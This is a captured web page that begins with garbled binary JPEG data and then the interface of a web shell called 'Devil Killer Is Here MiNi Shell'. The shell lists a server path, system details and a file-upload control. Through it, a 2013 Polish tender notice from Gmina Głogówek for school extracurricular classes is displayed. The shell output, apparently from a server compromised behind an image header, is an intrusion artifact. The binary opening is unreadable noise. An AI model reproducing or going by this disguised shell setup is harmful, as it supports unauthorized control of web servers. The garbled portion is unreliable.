JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130626/124513-N-2013.html

<p class="kh_header"><b>Głogówek: Świadczenie usług edukacyjnych na rzecz uczniów w ramach projektu Głogówecka Szkoła Kompetencji Kluczowych - część II: pierwszy  okres roku szkolnego 2013/2014.</b><br>
<b>Numer ogłoszenia: 124513 - 2013; data zamieszczenia: 26.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Głogówek , ul. Rynek 1, 48-250 Głogówek, woj. opolskie, tel. 77 4069900, 4069915, faks 77 4069906.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych na rzecz uczniów w ramach projektu Głogówecka Szkoła Kompetencji Kluczowych - część II: pierwszy  okres roku szkolnego 2013/2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usługi  edukacyjnej,  polegającej  na opracowaniu autorskiego programu, organizacji i przeprowadzeniu dodatkowych zajęć pozalekcyjnych  dla uczniów uczestniczących w projekcie Głogówecka Szkoła Kompetencji Kluczowych- współfinansowanym z Europejskiego Funduszu Społecznego;  realizowanym  przez Gminę Głogówek w ramach PO KL, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2.Wykonawca usługi na każdym etapie jej realizacji, zwłaszcza w autorskim programie i podczas zajęć z uczniami, uwzględnić powinien - adekwatnie do rodzaju i specyfiki zajęć - cele Projektu, to jest:
- Cel główny:
Wyrównanie szans edukacyjnych 450 uczniów (231 dz. i 219 ch.) Gminy Głogówek, mających utrudniony dostęp do atrakcyjnej, zróżnicowanej i dostosowanej do ich potrzeb oferty edukacyjnej oraz podniesienie jakości kształcenia w 4 szkołach uczestniczących w Projekcie - SP nr 2 i PG nr 1 w Głogówku, PSP i PG nr 2 w Racławicach Śl. (do 30.11.2014r.);
- Cele szczegółowe:
1)Podniesienie poziomu kompetencji kluczowych u 450 uczniów (231 dz. i 219 ch.) Gminy Głogówek
2)Podniesienie motywacji do uczenia się i aspiracji edukacyjnych 40 uczniów (19 dz. i 21 ch.) Gminy Głogówek wykazujących problemy w nauce (do 30.11.2014r.)
3)Rozwinięcie umiejętności planowania ścieżki rozwoju u 256 uczniów (135 dz. i 121 ch.) klas trzecich wszystkich gimnazjów Gminy Głogówek, na poziomie umożliwiającym świadomy wybór ścieżki edukacyjnej i zawodowej, w kontekście uwarunkowań lokalnego i regionalnego rynku pracy (do 30.11.2014r.)
4)Zwiększenie atrakcyjności oferty edukacyjnej 4 szkół uczestniczących w Projekcie:  SP nr 2 i PG nr 1 w Głogówku, PSP i PG nr 2 w Racławicach Śl. (od 01.01.2013 r. do 30.11. 2014 r.)
5)Podniesienie skuteczności kształcenia w 4 szkołach biorących udział w Projekcie: SP nr 2 i PG nr 1 w Głogówku, PSP i PG nr 2 w Racławicach Śl. (od 01.01.2013 r. do 30.11.2014 r.).
3.Usługa skierowana jest do uczniów szkół uczestniczących w Projekcie: Szkoły Podstawowej nr 2 w Głogówku, Publicznego Gimnazjum nr 1 w Głogówku, Publicznej Szkoły Podstawowej i Publicznego Gimnazjum nr 2 w Racławicach Śląskich. 
4.Dni tygodnia, w których będą odbywały się zajęcia (z możliwością prowadzenia zajęć w soboty), oraz  godziny zajęć ustala się w porozumieniu z Kierownikiem Projektu.
5.Typy zajęć objętych przedmiotem zamówienia:
1)Dodatkowe zajęcia dydaktyczno - wyrównawcze z j. polskiego i matematyki dla uczniów klas IV. szkoły podstawowej i  I.  gimnazjum.
2)Doradztwo i opieka psychologiczno - pedagogiczna dla uczniów wykazujących problemy w nauce. 
3)Dodatkowe zajęcia pozalekcyjne i pozaszkolne. Klub Smyka Matematyka - zajęcia rozwijające dla uczniów klas I-III szkoły podstawowej w formie zabaw logiczno-matematycznych,
4)Dodatkowe zajęcia pozalekcyjne i pozaszkolne. Klub Młodego Odkrywcy -  zajęcia dla uczniów klas I-III gimnazjów; rozwijające kompetencje matematyczne i naukowo-techniczne.
5)Dodatkowe zajęcia pozalekcyjne i pozaszkolne. Klub Twórczego Ucznia - zajęcia dla uczniów klas IV - VI szkoły podstawowej i I-III gimnazjum; obejmujące trening twórczości i techniki uczenia się.
6)Dodatkowe zajęcia pozalekcyjne i pozaszkolne. Klub Animatorów Kultury i Sztuki - zajęcia dla uczniów klas IV - VI szkoły podstawowej oraz dla uczniów klas I-III gimnazjum; rozwijające kompetencję posługiwania się językiem ojczystym oraz świadomość i ekspresję kulturalną.
7)Dodatkowe zajęcia pozalekcyjne i pozaszkolne. Klub ICT - zajęcia  dla uczniów klas IV-VI (w szkołach podstawowych), zajęcia dla uczniów klas I-III (w gimnazjach) rozwijające kompetencje informatyczne.
6.Warunki realizacji przedmiotu zamówienia:
Szczegółowy zakres przedmiotu zamówienia obejmuje:
Przedmiotem zamówienia jest realizacja zajęć pozalekcyjnych. Do zadań Wykonawcy należy: 
a.napisania autorskiego programu zajęć kształtujących kompetencje kluczowe, dostosowanego do wieku uczestników zajęć i przewidzianej liczby godzin dla danego typu zajęć, zawierającego: cele, treści, metody (z dominacją metod aktywizujących), opis założonych osiągnięć uczestników, propozycję ewaluacji programu,
b.przeprowadzenie rekrutacji uczniów na zajęcia, przy wsparciu Kierownika Projektu dla uczniów w danej szkole,
c.przeprowadzenie wskazanej liczby godzin lekcyjnych zajęć, według autorskiego programu,
d.zrealizowanie   zajęć  w okresie   do końca grudnia  2013 roku , według harmonogramu uzgodnionego z Kierownikiem Projektu,
e.prowadzenia  dziennika zajęć, imiennej listy obecności z podpisami uczestników i Karty czasu pracy,
f.uczestniczenie w akcji promocyjnej projektu (m.in. uczestnictwo w spotkaniach dotyczących projektu, stosowanie logotypów i formułek promocyjnych w materiałach/dokumentach wytwarzanych podczas realizacji projektu i/lub korespondencji),
g.wykonanie dokumentacji zdjęciowej zajęć,
h.przygotowania uczniów do prezentacji wyników zajęć,
i.prowadzenia ewaluacji bieżącej i końcowej prowadzonych zajęć oraz przekazanie raportu Kierownikowi Projektu,
j.sprawowanie  opieki nad uczniami podczas zajęć i wyjazdów projektowych (jeśli program je przewiduje),
k.prowadzenia zajęć z wykorzystaniem  pomocy dydaktycznych, sprzętu multimedialnego oraz materiałów zakupionych w ramach realizacji projektu Głogówecka Szkoła Kompetencji Kluczowych i w ramach wcześniej realizowanych przez Gminę projektów współfinansowanych ze środków Unii Europejskiej.
7.Zamawiający podzielił przedmiot zamówienia na 34 części i dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć jedną ofertę składającą się z jednej lub kilku ofert częściowych.
Dotyczy: 
CZĘŚĆ 1. Dodatkowe zajęcia dydaktyczno - wyrównawcze z matematyki dla 1 grupy (A) liczącej 8 uczniów  w Publicznym Gimnazjum nr 1 w Głogówku - 18 godzin lekcyjnych, 
CZĘŚĆ 2. Dodatkowe zajęcia dydaktyczno - wyrównawcze z matematyki dla 1 grupy (B) liczącej 8 uczniów  w Publicznym Gimnazjum nr 1 w Głogówku - 18 godzin lekcyjnych,  
CZĘŚĆ 3. Dodatkowe zajęcia dydaktyczno - wyrównawcze z języka polskiego dla 1 grupy (A) liczącej 8 uczniów  w Publicznym Gimnazjum nr 1 w Głogówku - 18 godzin lekcyjnych, CZĘŚĆ 4. Dodatkowe zajęcia dydaktyczno - wyrównawcze z języka polskiego dla 1 grupy (B) liczącej 8 uczniów  w Publicznym Gimnazjum nr 1 w Głogówku - 18 godzin lekcyjnych,
 CZĘŚĆ 5. Dodatkowe zajęcia dydaktyczno - wyrównawcze z matematyki dla 1 grupy  liczącej 8 uczniów  w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 18 godzin lekcyjnych, 
CZĘŚĆ 6. Dodatkowe zajęcia dydaktyczno - wyrównawcze z języka polskiego dla 1 grupy  liczącej 8 uczniów  w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 18 godzin lekcyjnych, 
CZĘŚĆ 7. Dodatkowe zajęcia dydaktyczno - wyrównawcze z matematyki dla 1 grupy  liczącej 8 uczniów  w Szkole Podstawowej  w Racławicach Śląskich - 18 godzin lekcyjnych, 
CZĘŚĆ 8. Dodatkowe zajęcia dydaktyczno - wyrównawcze z języka polskiego  dla 1 grupy  liczącej 8 uczniów  w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 18 godzin lekcyjnych, 
CZĘŚĆ 9. Dodatkowe zajęcia dydaktyczno - wyrównawcze z matematyki dla 1 grupy  liczącej 8 uczniów  w Szkole Podstawowej nr 2 w Głogówku - 18 godzin lekcyjnych, 
 CZĘŚĆ 10. Dodatkowe zajęcia dydaktyczno - wyrównawcze z języka polskiego dla 1 grupy  liczącej 8 uczniów  w Szkole Podstawowej nr 2 w Głogówku - 18 godzin lekcyjnych, 
 CZĘŚĆ 11. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z pedagogiem dla 1 grupy (A) liczącej 4 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 8 godzin lekcyjnych, 
CZĘŚĆ 12. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z pedagogiem dla 1 grupy (B) liczącej 4 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 8 godzin lekcyjnych, 
CZĘŚĆ 13. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z psychologiem dla 1 grupy (A) liczącej 4 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 8 godzin lekcyjnych, 
CZĘŚĆ 14. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z psychologiem dla 1 grupy (B) liczącej 4 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 8 godzin lekcyjnych, 
CZĘŚĆ 15. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z pedagogiem dla 1 grupy liczącej 4 uczniów w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 8 godzin lekcyjnych, 
CZĘŚĆ 16. . Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z psychologiem dla 1 grupy liczącej 4 uczniów w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 8 godzin lekcyjnych, 
CZĘŚĆ 17. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z pedagogiem dla 1 grupy liczącej 4 uczniów w Szkole Podstawowej w Racławicach Śląskich - 8 godzin lekcyjnych, 
CZĘŚĆ 18. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z psychologiem dla 1 grupy liczącej 4 uczniów w Szkole Podstawowej w Racławicach Śląskich - 8 godzin lekcyjnych, 
CZĘŚĆ 19. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z pedagogiem dla 1 grupy liczącej 4 uczniów w Szkole Podstawowej nr 2 w Głogówku - 8 godzin lekcyjnych, 
 CZĘŚĆ 20. Doradztwo i opieka psychologiczno - pedagogiczna: zajęcia z psychologiem dla 1 grupy liczącej 4 uczniów w Szkole Podstawowej nr 2 w Głogówku - 8 godzin lekcyjnych, 
CZĘŚĆ 21. Pozalekcyjne zajęcia informatyczne w ramach Klubu ICT dla 1 grupy  liczącej 10 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 15  godzin lekcyjnych, 
CZĘŚĆ 22. Zajęcia pozalekcyjne w ramach Klubu Twórczego Ucznia dla 1 grupy (A) liczącej 10 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 20 godzin lekcyjnych, 
CZĘŚĆ 23. Zajęcia pozalekcyjne w ramach Klubu Twórczego Ucznia dla 1 grupy (B)  liczącej 10 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 20 godzin lekcyjnych, 
CZĘŚĆ 24. Zajęcia pozalekcyjne w ramach Klubu Młodego Odkrywcy dla 1 grupy  liczącej 10 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 25 godzin lekcyjnych, 
CZĘŚĆ 25. Zajęcia pozalekcyjne w ramach Klubu Animatorów Kultury i Sztuki  dla 1 grupy   liczącej 10 uczniów w Publicznym Gimnazjum nr 1 w Głogówku - 20 godzin lekcyjnych,  
CZĘŚĆ 26. Zajęcia pozalekcyjne w ramach Klubu Twórczego Ucznia dla 1 grupy  liczącej 10 uczniów w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 20 godzin lekcyjnych, 
CZĘŚĆ 27. Zajęcia pozalekcyjne w ramach Klubu Animatorów Kultury i Sztuki  dla 1 grupy   liczącej 10 uczniów w Publicznym Gimnazjum nr 2 w Racławicach Śląskich - 20 godzin lekcyjnych,  
CZĘŚĆ 28. Zajęcia pozalekcyjne w ramach Klubu Smyka Matematyka   dla 1 grupy  liczącej 10 uczniów w Publicznej Szkole Podstawowej w Racławicach Śl.  - 15 godzin lekcyjnych,  
CZĘŚĆ 29. Zajęcia pozalekcyjne w ramach Klubu Twórczego Ucznia dla 1 grupy  liczącej 10 uczniów w Szkole Podstawowej  w Racławicach Śląskich - 20 godzin lekcyjnych, 
CZĘŚĆ 30. Zajęcia pozalekcyjne w ramach Klubu Animatorów Kultury i Sztuki  dla 1 grupy   liczącej 10 uczniów w Szkole Podstawowej  w Racławicach Śląskich - 20 godzin lekcyjnych,  
CZĘŚĆ 31. Zajęcia pozalekcyjne w ramach Klubu Smyka Matematyka   dla 1 grupy  liczącej 10 uczniów w  Szkole Podstawowej nr 2 w Głogówku.  - 15 godzin lekcyjnych,  
CZĘŚĆ 32. Pozalekcyjne zajęcia informatyczne w ramach Klubu ICT dla 1 grupy liczącej 10 uczniów w Szkole Podstawowej nr 2 w Głogówku - 15  godzin lekcyjnych, 
CZĘŚĆ 33. Zajęcia pozalekcyjne w ramach Klubu Twórczego Ucznia dla 1 grupy  liczącej 10 uczniów w Szkole Podstawowej nr 2 w Głogówku - 20 godzin lekcyjnych, 
CZĘŚĆ 34. Zajęcia pozalekcyjne w ramach Klubu Animatorów Kultury i Sztuki  dla 1 grupy   liczącej 10 uczniów w Szkole Podstawowej nr 2 w Głogówku - 20 godzin lekcyjnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 34.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający uzna, ze Wykonawca spełnił warunek, jeżeli złoży oświadczenie w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych stanowiące załącznik nr 3 do SIWZ. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunki, jeśli wykaże, że posiada co najmniej stopień awansu zawodowego nauczyciela kontraktowego, a także kwalifikacje niezbędne do prowadzenia zajęć z danej części zamówienia, zgodne z Rozporządzeniem Ministra Edukacji z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli Narodowej (Dz. U. z 2009r. Nr 50, poz. 400 ze zm.) lub posiada uprawnienia do świadczenia usług edukacyjnych na poziomie szkolnictwa podstawowego lub gimnazjalnego zgodnie z daną częścią zamówienia, załącznik do SIWZ -odpowiednio: nr 2a (dla osób fizycznych) lub 2b (dla prowadzących działalność gospodarczą). Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>mawiający uzna, że wykonawca spełnił warunek dysponowania odpowiednim potencjałem technicznym, jeżeli złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku firmy: wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą brały udział w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; zakres ww. dokumentów musi potwierdzać spełnienie odpowiednio warunku określonego w Rozdziale V ust. 1 pkt 2) SIWZ. Wzór wykazu znajduje się w Załączniku nr 5 do SWIZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnił warunek sytuacji ekonomicznej i finansowej, jeżeli złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - zał. nr 1 do SIWZ, 2. Autorski program zajęć - zał. nr 6 do SIWZ, 3. Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany. 4. Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Jakość - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
